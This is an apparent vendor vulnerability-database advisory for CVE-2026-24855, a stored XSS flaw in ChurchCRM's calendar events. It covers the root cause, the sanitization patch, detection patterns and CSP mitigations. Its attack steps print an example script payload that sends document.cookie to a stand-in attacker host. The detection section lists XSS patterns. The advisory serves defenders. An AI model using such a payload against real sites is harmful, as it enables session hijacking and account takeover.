The SentinelOne Annual Threat Report - A Defenders Guide from the FrontlinesThe SentinelOne Annual Threat ReportGet the Report
Experiencing a Breach?Blog
Get StartedContact Us
SentinelOne
  • Platform
    Platform Overview
    • Singularity Platform
      Welcome to Integrated Enterprise Security
    • AI for Security
      Leading the Way in AI-Powered Security Solutions
    • Securing AI
      Accelerate AI Adoption with Secure AI Tools, Apps, and Agents.
    • How It Works
      The Singularity XDR Difference
    • Singularity Marketplace
      One-Click Integrations to Unlock the Power of XDR
    • Pricing & Packaging
      Comparisons and Guidance at a Glance
    Data & AI
    • Purple AI
      Accelerate SecOps with Generative AI
    • Singularity Hyperautomation
      Easily Automate Security Processes
    • AI-SIEM
      The AI SIEM for the Autonomous SOC
    • Singularity Data Lake
      AI-Powered, Unified Data Lake
    • Singularity Data Lake for Log Analytics
      Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
    Endpoint Security
    • Singularity Endpoint
      Autonomous Prevention, Detection, and Response
    • Singularity XDR
      Native & Open Protection, Detection, and Response
    • Singularity RemoteOps Forensics
      Orchestrate Forensics at Scale
    • Singularity Threat Intelligence
      Comprehensive Adversary Intelligence
    • Singularity Vulnerability Management
      Application & OS Vulnerability Management
    • Singularity Identity
      Identity Threat Detection and Response
    Cloud Security
    • Singularity Cloud Security
      Block Attacks with an AI-Powered CNAPP
    • Singularity Cloud Native Security
      Secure Cloud and Development Resources
    • Singularity Cloud Workload Security
      Real-Time Cloud Workload Protection Platform
    • Singularity Cloud Data Security
      AI-Powered Threat Detection for Cloud Storage
    • Singularity Cloud Security Posture Management
      Detect and Remediate Cloud Misconfigurations
    Securing AI
    • Prompt Security
      Secure AI Tools Across Your Enterprise
  • Why SentinelOne?
    Why SentinelOne?
    • Why SentinelOne?
      Cybersecurity Built for What’s Next
    • Our Customers
      Trusted by the World’s Leading Enterprises
    • Industry Recognition
      Tested and Proven by the Experts
    • About Us
      The Industry Leader in Autonomous Cybersecurity
    Compare SentinelOne
    • Arctic Wolf
    • Broadcom
    • CrowdStrike
    • Cybereason
    • Microsoft
    • Palo Alto Networks
    • Sophos
    • Splunk
    • Trellix
    • Trend Micro
    • Wiz
    Verticals
    • Energy
    • Federal Government
    • Finance
    • Healthcare
    • Higher Education
    • K-12 Education
    • Manufacturing
    • Retail
    • State and Local Government
  • Services
    Managed Services
    • Managed Services Overview
      Wayfinder Threat Detection & Response
    • Threat Hunting
      World-Class Expertise and Threat Intelligence
    • Managed Detection & Response
      24/7/365 Expert MDR Across Your Entire Environment
    • Incident Readiness & Response
      DFIR, Breach Readiness, & Compromise Assessments
    Support, Deployment, & Health
    • Technical Account Management
      Customer Success with Personalized Service
    • SentinelOne GO
      Guided Onboarding & Deployment Advisory
    • SentinelOne University
      Live and On-Demand Training
    • Services Overview
      Comprehensive Solutions for Seamless Security Operations
    • SentinelOne Community
      Community Login
  • Partners
    Our Network
    • MSSP Partners
      Succeed Faster with SentinelOne
    • Singularity Marketplace
      Extend the Power of S1 Technology
    • Cyber Risk Partners
      Enlist Pro Response and Advisory Teams
    • Technology Alliances
      Integrated, Enterprise-Scale Solutions
    • SentinelOne for AWS
      Hosted in AWS Regions Around the World
    • Channel Partners
      Deliver the Right Solutions, Together
    • SentinelOne for Google Cloud
      Unified, Autonomous Security Giving Defenders the Advantage at Global Scale
    • Partner Locator
      Your Go-to Source for Our Top Partners in Your Region
    Partner Portal→
  • Resources
    Resource Center
    • Case Studies
    • Data Sheets
    • eBooks
    • Reports
    • Videos
    • Webinars
    • Whitepapers
    • Events
    View All Resources→
    Blog
    • Feature Spotlight
    • For CISO/CIO
    • From the Front Lines
    • Identity
    • Cloud
    • macOS
    • SentinelOne Blog
    Blog→
    Tech Resources
    • SentinelLABS
    • Ransomware Anthology
    • Cybersecurity 101
  • About
    About SentinelOne
    • About SentinelOne
      The Industry Leader in Cybersecurity
    • Investor Relations
      Financial Information & Events
    • SentinelLABS
      Threat Research for the Modern Threat Hunter
    • Careers
      The Latest Job Opportunities
    • Press & News
      Company Announcements
    • Cybersecurity Blog
      The Latest Cybersecurity Threats, News, & More
    • FAQ
      Get Answers to Our Most Frequently Asked Questions
    • DataSet
      The Live Data Platform
    • S Foundation
      Securing a Safer Future for All
    • S Ventures
      Investing in the Next Generation of Security, Data and AI
  • Pricing
Get StartedContact Us
CVE Vulnerability Database
Vulnerability Database/CVE-2026-24855

CVE-2026-24855: ChurchCRM Stored XSS Vulnerability

CVE-2026-24855 is a stored cross-site scripting flaw in ChurchCRM's event calendar that enables low-privileged users to inject malicious scripts, potentially leading to account takeover. This article covers technical details, affected versions, impact, and mitigation steps.

Published: February 6, 2026

CVE-2026-24855 Overview

CVE-2026-24855 is a Stored Cross-Site Scripting (XSS) vulnerability in ChurchCRM, an open-source church management system. The vulnerability exists in the Create Events functionality within the Church Calendar module. Users with low privileges can inject malicious XSS payloads into the Description field when creating calendar events. Because this payload is stored in the database and rendered without proper sanitization, any user viewing the malicious event—including administrators—will have the script executed in their browser context. This can lead to session hijacking, credential theft, and full account takeover.

Critical Impact

Low-privileged users can inject persistent XSS payloads that execute in administrator browsers, enabling complete account takeover and administrative access compromise.

Affected Products

  • ChurchCRM versions prior to 6.7.2
  • ChurchCRM Church Calendar module (Create Events functionality)
  • ChurchCRM installations with multi-user access

Discovery Timeline

  • 2026-01-30 - CVE CVE-2026-24855 published to NVD
  • 2026-02-04 - Last updated in NVD database

Technical Details for CVE-2026-24855

Vulnerability Analysis

This vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), commonly known as Cross-Site Scripting. The flaw exists in the calendar event creation API endpoint located at src/api/routes/calendar/events.php. When creating new calendar events, user-supplied input in the Title and Description fields was passed directly to the database without proper sanitization or encoding.

The stored nature of this XSS vulnerability makes it particularly dangerous because the malicious payload persists in the database and executes every time any user views the compromised calendar event. An attacker with basic user privileges could craft a calendar event containing JavaScript code in the Description field. When an administrator or other privileged user views the church calendar, the malicious script executes with their session context.

Root Cause

The root cause is missing input sanitization in the event creation API handler. The vulnerable code directly assigned user input to the event object properties without calling sanitization functions:

php
$event->setTitle($input['Title']);
$event->setDesc($input['Desc']);

The Title and Desc fields accepted raw user input that could contain HTML and JavaScript, which was then stored in the database and rendered unsanitized in the calendar view.

Attack Vector

The attack requires network access and valid low-privilege user credentials to the ChurchCRM instance. An attacker would:

  1. Authenticate to ChurchCRM with any user account that has permission to create calendar events
  2. Navigate to the Church Calendar and create a new event
  3. Insert an XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) in the Description field
  4. Save the event
  5. Wait for an administrator or other target user to view the calendar

When the victim views the calendar, the stored payload executes, potentially exfiltrating session tokens, modifying page content, or performing actions as the victim user.

The security patch implemented proper input sanitization using InputUtils::sanitizeText() for the Title field and InputUtils::sanitizeHTML() for the Description field:

php
// Security patch in src/api/routes/calendar/events.php
// Fix GHSA-49qp-cfqx-c767: Stored XSS in Calendar Events Description

// we have event type and pined calendars.  now create the event.
$event = new Event();
-    $event->setTitle($input['Title']);
+    $event->setTitle(InputUtils::sanitizeText($input['Title']));
$event->setEventType($type);
-    $event->setDesc($input['Desc']);
+    $event->setDesc(InputUtils::sanitizeHTML($input['Desc']));
$event->setStart(str_replace('T', ' ', $input['Start']));
$event->setEnd(str_replace('T', ' ', $input['End']));
$event->setText(InputUtils::sanitizeHTML($input['Text']));

Source: GitHub Commit

Detection Methods for CVE-2026-24855

Indicators of Compromise

  • Unusual JavaScript or HTML tags in calendar event descriptions or titles in the database
  • Events containing <script>, <img onerror=, <svg onload=, or similar XSS payload patterns
  • Unexpected outbound network requests from user browsers when viewing calendar pages
  • Session token theft or unauthorized administrative actions following calendar access

Detection Strategies

  • Implement Web Application Firewall (WAF) rules to detect common XSS patterns in HTTP POST requests to calendar event endpoints
  • Monitor database tables storing calendar events for suspicious HTML or JavaScript content
  • Enable Content Security Policy (CSP) headers to detect and block inline script execution
  • Audit application logs for unusual event creation patterns from low-privileged accounts

Monitoring Recommendations

  • Enable detailed logging for all calendar event creation and modification API calls
  • Implement browser-based XSS detection using CSP violation reporting
  • Review calendar event content periodically for signs of malicious payload injection
  • Monitor for anomalous user session behavior that may indicate session hijacking

How to Mitigate CVE-2026-24855

Immediate Actions Required

  • Upgrade ChurchCRM to version 6.7.2 or later immediately
  • Review existing calendar events in the database for potential malicious content
  • Audit user accounts that have created calendar events for suspicious activity
  • Consider invalidating all active sessions and requiring re-authentication after the upgrade

Patch Information

ChurchCRM version 6.7.2 addresses this vulnerability by implementing proper input sanitization using InputUtils::sanitizeText() for plain text fields and InputUtils::sanitizeHTML() for fields that may contain formatted content. The fix ensures that user-supplied input is properly encoded before storage and rendering, preventing malicious scripts from executing.

For detailed patch information, refer to the GitHub Security Advisory GHSA-49qp-cfqx-c767.

Workarounds

  • If immediate upgrade is not possible, restrict calendar event creation permissions to trusted administrators only
  • Implement a Web Application Firewall (WAF) with XSS filtering rules as a temporary mitigation
  • Add Content Security Policy headers to restrict inline script execution: Content-Security-Policy: script-src 'self'
  • Manually review and sanitize existing calendar event content in the database
bash
# Configuration example: Add CSP header in Apache
# Add to .htaccess or Apache config
Header set Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'"

# For nginx, add to server block
# add_header Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'";

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

  • Vulnerability Details
  • TypeXSS

  • Vendor/TechChurchcrm

  • SeverityHIGH

  • CVSS Score7.2

  • EPSS Probability0.05%

  • Known ExploitedNo
  • CVSS Vector
  • CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:H/VA:N/SC:H/SI:H/SA:H/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
  • Impact Assessment
  • ConfidentialityLow
  • IntegrityHigh
  • AvailabilityNone
  • CWE References
  • CWE-79
  • Technical References
  • GitHub Commit Update

  • GitHub Commit Update

  • GitHub Security Advisory GHSA-49qp-cfqx-c767
  • Related CVEs
  • CVE-2026-35575: ChurchCRM Stored XSS Vulnerability

  • CVE-2026-35576: ChurchCRM Stored XSS Vulnerability

  • CVE-2026-39335: ChurchCRM XSS Vulnerability

  • CVE-2026-39344: ChurchCRM Reflected XSS Vulnerability
Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the World’s Most Advanced Cybersecurity Platform

See how our intelligent, autonomous cybersecurity platform can protect your organization now and into the future.

Try SentinelOne
  • Get Started
  • Get a Demo
  • Product Tour
  • Why SentinelOne
  • Pricing & Packaging
  • FAQ
  • Contact
  • Contact Us
  • Customer Support
  • SentinelOne Status
  • Language
  • Platform
  • Singularity Platform
  • Singularity Endpoint
  • Singularity Cloud
  • Singularity AI-SIEM
  • Singularity Identity
  • Singularity Marketplace
  • Purple AI
  • Services
  • Wayfinder TDR
  • SentinelOne GO
  • Technical Account Management
  • Support Services
  • Verticals
  • Energy
  • Federal Government
  • Finance
  • Healthcare
  • Higher Education
  • K-12 Education
  • Manufacturing
  • Retail
  • State and Local Government
  • Cybersecurity for SMB
  • Resources
  • Blog
  • Labs
  • Case Studies
  • Videos
  • Product Tours
  • Events
  • Cybersecurity 101
  • eBooks
  • Webinars
  • Whitepapers
  • Press
  • News
  • Ransomware Anthology
  • Company
  • About Us
  • Our Customers
  • Careers
  • Partners
  • Legal & Compliance
  • Security & Compliance
  • Investor Relations
  • S Foundation
  • S Ventures

©2026 SentinelOne, All Rights Reserved.

Privacy Notice Terms of Use

English